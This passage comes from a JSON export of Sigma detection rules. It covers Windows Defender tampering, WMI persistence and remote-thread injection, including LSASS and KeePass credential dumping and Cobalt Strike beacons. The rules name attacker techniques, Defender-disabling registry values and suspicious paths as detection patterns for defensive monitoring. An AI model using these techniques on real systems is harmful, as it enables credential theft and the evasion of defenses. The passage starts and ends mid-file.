'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    filter_begins:\n        ProcessName|startswith:\n            - 'C:\\Windows\\System32\\DriverStore\\'\n            - 'C:\\WINDOWS\\Installer\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Google Chrome GoogleUpdate.exe\n    - Some Taskmgr.exe related activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_asr_psexec_wmi.yml",
    "content": "title: PSExec and WMI Process Creations Block\nid: 97b9ce1e-c5ab-11ea-87d0-0242ac130003\nstatus: test\ndescription: Detects blocking of process creations originating from PSExec and WMI commands\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands\n    - https://twitter.com/duff22b/status/1280166329660497920\nauthor: Bhabesh Raj\ndate: 2020-07-14\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1047\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: windefend\n    definition: 'Requirements:Enabled Block process creations originating from PSExec and WMI commands from Attack Surface Reduction (GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c)'\ndetection:\n    selection:\n        EventID: 1121\n        ProcessName|endswith:\n            - '\\wmiprvse.exe'\n            - '\\psexesvc.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_config_change_exclusion_added.yml",
    "content": "title: Windows Defender Exclusions Added\nid: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\nstatus: stable\ndescription: Detects the Setting of Windows Defender Exclusions\nreferences:\n    - https://twitter.com/_nullbind/status/1204923340810543109\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-07-06\nmodified: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5007 # The antimalware platform configuration changed.\n        NewValue|contains: '\\Microsoft\\Windows Defender\\Exclusions'\n    condition: selection\nfalsepositives:\n    - Administrator actions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml",
    "content": "title: Windows Defender Exploit Guard Tamper\nid: a3ab73f1-bd46-4319-8f06-4b20d0617886\nstatus: test\ndescription: |\n    Detects when someone is adding or removing applications or folders from exploit guard \"ProtectedFolders\" or \"AllowedApplications\"\nreferences:\n    - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    allowed_apps_key:\n        EventID: 5007 # The antimalware platform configuration changed.\n        NewValue|contains: '\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications\\'\n    allowed_apps_path:\n        NewValue|contains:\n            # Add more paths you don't allow in your org\n            - '\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\PerfLogs\\'\n            - '\\Windows\\Temp\\'\n    protected_folders:\n        EventID: 5007 # The antimalware platform configuration changed.\n        # This will trigger on any folder removal. If you experience FP's then add another selection with specific paths\n        OldValue|contains: '\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders\\'\n    condition: all of allowed_apps* or protected_folders\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_config_change_sample_submission_consent.yml",
    "content": "title: Windows Defender Submit Sample Feature Disabled\nid: 91903aba-1088-42ee-b680-d6d94fe002b0\nrelated:\n    - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\n      type: similar\n    - id: a3ab73f1-bd46-4319-8f06-4b20d0617886\n      type: similar\n    - id: 801bd44f-ceed-4eb6-887c-11544633c0aa\n      type: similar\nstatus: stable\ndescription: Detects disabling of the \"Automatic Sample Submission\" feature of Windows Defender.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\n    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5007 # The antimalware platform configuration changed.\n        NewValue|contains: '\\Real-Time Protection\\SubmitSamplesConsent = 0x0'\n    condition: selection\nfalsepositives:\n    - Administrator activity (must be investigated)\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_history_delete.yml",
    "content": "title: Windows Defender Malware Detection History Deletion\nid: 2afe6582-e149-11ea-87d0-0242ac130003\nstatus: test\ndescription: Windows Defender logs when the history of detected infections is deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus\n    - https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e\nauthor: Cian Heasley\ndate: 2020-08-13\nmodified: 2023-11-24\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 1013 # The antimalware platform deleted history of malware and other potentially unwanted software.\n    condition: selection\nfalsepositives:\n    - Deletion of Defender malware detections history for legitimate reasons\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml",
    "content": "title: Windows Defender Malware And PUA Scanning Disabled\nid: bc275be9-0bec-4d77-8c8f-281a2df6710f\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: obsolete\nstatus: stable\ndescription: Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2023-11-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5010 # Scanning for malware and other potentially unwanted software is disabled.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_malware_detected_amsi_source.yml",
    "content": "title: Windows Defender AMSI Trigger Detected\nid: ea9bf0fa-edec-4fb8-8b78-b119f2528186\nstatus: stable\ndescription: Detects triggering of AMSI by Windows Defender.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps\nauthor: Bhabesh Raj\ndate: 2020-09-14\nmodified: 2022-12-07\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 1116 # The antimalware platform detected malware or other potentially unwanted software.\n        SourceName: 'AMSI'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml",
    "content": "title: Windows Defender Real-time Protection Disabled\nid: b28e58e4-2a72-4fae-bdee-0fbe904db642\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: obsolete\nstatus: stable\ndescription: |\n    Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a \"medium\" level if this occurs too many times in your environment\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2023-11-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5001 # Real-time protection is disabled.\n    condition: selection\nfalsepositives:\n    - Administrator actions (should be investigated)\n    - Seen being triggered occasionally during Windows 8 Defender Updates\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml",
    "content": "title: Windows Defender Real-Time Protection Failure/Restart\nid: dd80db93-6ec2-4f4c-a017-ad40da6ffe81\nstatus: stable\ndescription: Detects issues with Windows Defender Real-Time Protection features\nreferences:\n    - Internal Research\n    - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\n    - https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346 # Contains the list of Feature Names (use for filtering purposes)\nauthor: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update)\ndate: 2023-03-28\nmodified: 2023-05-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID:\n            - 3002 # Real-Time Protection feature has encountered an error and failed\n            - 3007 # Real-time Protection feature has restarted\n    filter_optional_network_inspection:\n        Feature_Name: '%%886' # Network Inspection System\n        Reason:\n            - '%%892' # The system is missing updates that are required for running Network Inspection System.  Install the required updates and restart the device.\n            - '%%858' # Antimalware security intelligence has stopped functioning for an unknown reason. In some instances, restarting the service may resolve the problem.\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. Manual exception is required\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml",
    "content": "title: Win Defender Restored Quarantine File\nid: bc92ca75-cd42-4d61-9a37-9d5aa259c88b\nstatus: test\ndescription: Detects the restoration of files from the defender quarantine\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 1009 # The antimalware platform restored an item from quarantine.\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity restoring a file\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml",
    "content": "title: Windows Defender Configuration Changes\nid: 801bd44f-ceed-4eb6-887c-11544633c0aa\nrelated:\n    - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\n      type: similar\n    - id: a3ab73f1-bd46-4319-8f06-4b20d0617886\n      type: similar\n    - id: 91903aba-1088-42ee-b680-d6d94fe002b0\n      type: similar\nstatus: stable\ndescription: Detects suspicious changes to the Windows Defender configuration\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\n    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-06\nmodified: 2023-11-24\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5007 # The antimalware platform configuration changed.\n        NewValue|contains:\n            # TODO: Add more suspicious values\n            - '\\Windows Defender\\DisableAntiSpyware '\n            # - '\\Windows Defender\\Features\\TamperProtection ' # Might produce FP\n            - '\\Windows Defender\\Scan\\DisableRemovableDriveScanning '\n            - '\\Windows Defender\\Scan\\DisableScanningMappedNetworkDrivesForFullScan '\n            - '\\Windows Defender\\SpyNet\\DisableBlockAtFirstSeen '\n            - '\\Real-Time Protection\\SpyNetReporting '\n            # Exclusions changes are covered in 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\n            # Exploit guard changes are covered in a3ab73f1-bd46-4319-8f06-4b20d0617886\n    condition: selection\nfalsepositives:\n    - Administrator activity (must be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml",
    "content": "title: Microsoft Defender Tamper Protection Trigger\nid: 49e5bc24-8b86-49f1-b743-535f332c2856\nstatus: stable\ndescription: Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"\nreferences:\n    - https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\nauthor: Bhabesh Raj, Nasreddine Bencherchali\ndate: 2021-07-05\nmodified: 2022-12-06\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5013 # Tamper protection blocked a change to Microsoft Defender Antivirus. If Tamper protection is enabled then, any attempt to change any of Defender's settings is blocked. Event ID 5013 is generated and states which setting change was blocked.\n        Value|endswith:\n            - '\\Windows Defender\\DisableAntiSpyware'\n            - '\\Windows Defender\\DisableAntiVirus'\n            - '\\Windows Defender\\Scan\\DisableArchiveScanning'\n            - '\\Windows Defender\\Scan\\DisableScanningNetworkFiles'\n            - '\\Real-Time Protection\\DisableRealtimeMonitoring'\n            - '\\Real-Time Protection\\DisableBehaviorMonitoring'\n            - '\\Real-Time Protection\\DisableIOAVProtection'\n            - '\\Real-Time Protection\\DisableScriptScanning'\n    condition: selection\nfalsepositives:\n    - Administrator might try to disable defender features during testing (must be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_threat.yml",
    "content": "title: Windows Defender Threat Detected\nid: 57b649ef-ff42-4fb0-8bf6-62da243a1708\nstatus: stable\ndescription: Detects actions taken by Windows Defender malware detection engines\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus\nauthor: Ján Trenčanský\ndate: 2020-07-28\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID:\n            - 1006 # The antimalware engine found malware or other potentially unwanted software.\n            - 1015 # The antimalware platform detected suspicious behavior.\n            - 1116 # The antimalware platform detected malware or other potentially unwanted software.\n            - 1117 # he antimalware platform performed an action to protect your system from malware or other potentially unwanted software.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/windefend/win_defender_virus_scan_disabled.yml",
    "content": "title: Windows Defender Virus Scanning Feature Disabled\nid: 686c0b4b-9dd3-4847-9077-d6c1bbe36fcb\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: obsolete\nstatus: stable\ndescription: Detects disabling of the Windows Defender virus scanning feature\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2023-11-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID: 5012 # Scanning for viruses is disabled.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/wmi/win_wmi_persistence.yml",
    "content": "title: WMI Persistence\nid: 0b7889b4-5577-4521-a60a-3376ee7f9f7b\nstatus: test\ndescription: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.\nreferences:\n    - https://twitter.com/mattifestation/status/899646620148539397\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community\ndate: 2017-08-22\nmodified: 2022-02-10\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.003\nlogsource:\n    product: windows\n    service: wmi\n    definition: 'WMI Namespaces Auditing and SACL should be configured, EventID 5861 and 5859 detection requires Windows 10, 2012 and higher'\ndetection:\n    wmi_filter_to_consumer_binding:\n        EventID: 5861\n    consumer_keywords:\n        - 'ActiveScriptEventConsumer'\n        - 'CommandLineEventConsumer'\n        - 'CommandLineTemplate'\n        # - 'Binding EventFilter'  # too many false positive with HP Health Driver\n    wmi_filter_registration:\n        EventID: 5859\n    filter_scmevent:\n        Provider: 'SCM Event Provider'\n        Query: 'select * from MSFT_SCMEventLogEvent'\n        User: 'S-1-5-32-544'\n        PossibleCause: 'Permanent'\n    condition: ( (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration) ) and not filter_scmevent\nfalsepositives:\n    - Unknown (data set is too small; further testing needed)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml",
    "content": "title: HackTool - CACTUSTORCH Remote Thread Creation\nid: 2e4e488a-6164-4811-9ea1-f960c7359c40\nstatus: test\ndescription: Detects remote thread creation from CACTUSTORCH as described in references.\nreferences:\n    - https://twitter.com/SBousseaden/status/1090588499517079552 # Deleted\n    - https://github.com/mdsecactivebreach/CACTUSTORCH\nauthor: '@SBousseaden (detection), Thomas Patzke (rule)'\ndate: 2019-02-01\nmodified: 2023-05-05\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1055.012\n    - attack.t1059.005\n    - attack.t1059.007\n    - attack.t1218.005\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\System32\\cscript.exe'\n            - '\\System32\\wscript.exe'\n            - '\\System32\\mshta.exe'\n            - '\\winword.exe'\n            - '\\excel.exe'\n        TargetImage|contains: '\\SysWOW64\\'\n        StartModule: null\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml",
    "content": "title: HackTool - Potential CobaltStrike Process Injection\nid: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42\nstatus: test\ndescription: Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons\nreferences:\n    - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f\n    - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/\nauthor: Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community\ndate: 2018-11-30\nmodified: 2023-05-05\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.001\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        StartAddress|endswith:\n            - '0B80'\n            - '0C7C'\n            - '0C88'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml",
    "content": "title: Remote Thread Created In KeePass.EXE\nid: 77564cc2-7382-438b-a7f6-395c2ae53b9a\nstatus: test\ndescription: Detects remote thread creation in \"KeePass.exe\" which could indicates potential password dumping activity\nreferences:\n    - https://www.cisa.gov/uscert/ncas/alerts/aa20-259a\n    - https://github.com/denandz/KeeFarce\n    - https://github.com/GhostPack/KeeThief\nauthor: Timon Hackenjos\ndate: 2022-04-22\nmodified: 2023-05-05\ntags:\n    - attack.credential-access\n    - attack.t1555.005\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith: '\\KeePass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml",
    "content": "title: Remote Thread Creation In Mstsc.Exe From Suspicious Location\nid: c0aac16a-b1e7-4330-bab0-3c27bb4987c7\nstatus: test\ndescription: |\n    Detects remote thread creation in the \"mstsc.exe\" process by a process located in a potentially suspicious location.\n    This technique is often used by attackers in order to hook some APIs used by DLLs loaded by \"mstsc.exe\" during RDP authentications in order to steal credentials.\nreferences:\n    - https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-28\nmodified: 2024-01-22\ntags:\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith: '\\mstsc.exe'\n        SourceImage|contains:\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\PerfLogs\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml",
    "content": "title: Potential Credential Dumping Attempt Via PowerShell Remote Thread\nid: fb656378-f909-47c1-8747-278bf09f4f4f\nrelated:\n    - id: 3f07b9d1-2082-4c56-9277-613a621983cc\n      type: obsolete\n    - id: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5\n      type: similar\nstatus: test\ndescription: Detects remote thread creation by PowerShell processes into \"lsass.exe\"\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2022-12-18\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetImage|endswith: '\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml",
    "content": "title: Remote Thread Creation Via PowerShell In Uncommon Target\nid: 99b97608-3e21-4bfe-8217-2a127c396a0e\nrelated:\n    - id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50\n      type: similar\nstatus: test\ndescription: Detects the creation of a remote thread from a Powershell process in an uncommon target process\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-25\nmodified: 2023-11-10\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetImage|endswith:\n            # Note: Please add additional potential interesting targets to increase coverage\n            - '\\rundll32.exe'\n            - '\\regsvr32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_password_dumper_lsass.yml",
    "content": "title: Password Dumper Remote Thread in LSASS\nid: f239b326-2f41-4d6b-9dfa-c846a60ef505\nstatus: stable\ndescription: |\n    Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\n    The process in field Process is the malicious program. A single execution can lead to hundreds of events.\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm\nauthor: Thomas Patzke\ndate: 2017-02-19\nmodified: 2021-06-21\ntags:\n    - attack.credential-access\n    - attack.s0005\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        StartModule: ''\n    condition: selection\nfalsepositives:\n    - Antivirus products\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml",
    "content": "title: Rare Remote Thread Creation By Uncommon Source Image\nid: 02d1d718-dd13-41af-989d-ea85c7fab93f\nrelated:\n    - id: 66d31e5f-52d6-40a4-9615-002d3789a119\n      type: derived\nstatus: test\ndescription: Detects uncommon processes creating remote threads.\nreferences:\n    - Personal research, statistical analysis\n    - https://lolbas-project.github.io\nauthor: Perez Diego (@darkquassar), oscd.community\ndate: 2019-10-27\nmodified: 2025-12-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\bash.exe'\n            - '\\cscript.exe'\n            - '\\cvtres.exe'\n            - '\\defrag.exe'\n            - '\\dialer.exe'\n            - '\\dnx.exe'\n            - '\\esentutl.exe'\n            - '\\excel.exe'\n            - '\\expand.exe'\n            - '\\find.exe'\n            - '\\findstr.exe'\n            - '\\forfiles.exe'\n            - '\\gpupdate.exe'\n            - '\\hh.exe'\n            - '\\installutil.exe'\n            - '\\lync.exe'\n            - '\\makecab.exe'\n            - '\\mDNSResponder.exe'\n            - '\\monitoringhost.exe' # Loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools.\n            - '\\msbuild.exe'\n            - '\\mshta.exe'\n            - '\\mspaint.exe'\n            - '\\outlook.exe'\n            - '\\ping.exe'\n            - '\\provtool.exe'\n            - '\\python.exe'\n            - '\\regsvr32.exe'\n            - '\\robocopy.exe'\n            - '\\runonce.exe'\n            - '\\sapcimc.exe'\n            - '\\smartscreen.exe'\n            - '\\spoolsv.exe'\n            - '\\tstheme.exe'\n            - '\\userinit.exe'\n            - '\\vssadmin.exe'\n            - '\\vssvc.exe'\n            - '\\w3wp.exe'\n            - '\\winscp.exe'\n            - '\\winword.exe'\n 
           - '\\wmic.exe'\n            - '\\wscript.exe'\n    filter_main_conhost:\n        SourceImage:\n            - 'C:\\Windows\\System32\\Defrag.exe'\n            - 'C:\\Windows\\System32\\makecab.exe'\n        TargetImage: 'C:\\Windows\\System32\\conhost.exe'\n    filter_main_provtol_svchost:\n        SourceImage: 'C:\\Windows\\System32\\provtool.exe'\n        TargetImage: 'C:\\Windows\\System32\\svchost.exe'\n    filter_main_provtool_system:\n        SourceImage: 'C:\\Windows\\System32\\provtool.exe'\n        TargetImage: 'System'\n    filter_main_userinit:\n        SourceImage: 'C:\\Windows\\System32\\userinit.exe'\n        TargetImage: 'C:\\Windows\\explorer.exe'\n    filter_main_winword:\n        SourceImage|endswith: '\\WINWORD.EXE'\n        TargetImage|startswith:\n            - 'C:\\Program Files (x86)\\' # C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\n            - 'C:\\Program Files\\' # C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\AI\\ai.exe\n    filter_main_ms_office:\n        # Raised by following issue: https://github.com/SigmaHQ/sigma/issues/5529\n        SourceImage|startswith:\n            - 'C:\\Program Files\\Microsoft Office\\'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n        TargetImage: 'System'\n    filter_optional_explorer_vmtools:\n        SourceImage|endswith: '\\SysWOW64\\explorer.exe'\n        TargetImage:\n            - 'C:\\Program Files (x86)\\VMware\\VMware Tools\\vmtoolsd.exe'\n            - 'C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - This rule is best put in testing first in order to create a baseline that reflects the data in your environment.\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml",
    "content": "title: Remote Thread Creation By Uncommon Source Image\nid: 66d31e5f-52d6-40a4-9615-002d3789a119\nrelated:\n    - id: 02d1d718-dd13-41af-989d-ea85c7fab93f\n      type: derived\nstatus: test\ndescription: Detects uncommon processes creating remote threads.\nreferences:\n    - Personal research, statistical analysis\n    - https://lolbas-project.github.io\nauthor: Perez Diego (@darkquassar), oscd.community\ndate: 2019-10-27\nmodified: 2025-07-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\explorer.exe'\n            - '\\iexplore.exe'\n            - '\\msiexec.exe'\n            - '\\powerpnt.exe'\n            - '\\schtasks.exe'\n            - '\\winlogon.exe'\n    filter_main_winlogon_1:\n        SourceImage: 'C:\\Windows\\System32\\winlogon.exe'\n        TargetImage:\n            - 'C:\\Windows\\System32\\services.exe' # happens on Windows 7\n            - 'C:\\Windows\\System32\\wininit.exe' # happens on Windows 7\n            - 'C:\\Windows\\System32\\csrss.exe' # multiple OS\n            - 'C:\\Windows\\System32\\LogonUI.exe' # multiple OS\n            - 'C:\\Windows\\System32\\wlrmdr.exe'\n            - 'C:\\Windows\\System32\\AtBroker.exe'\n            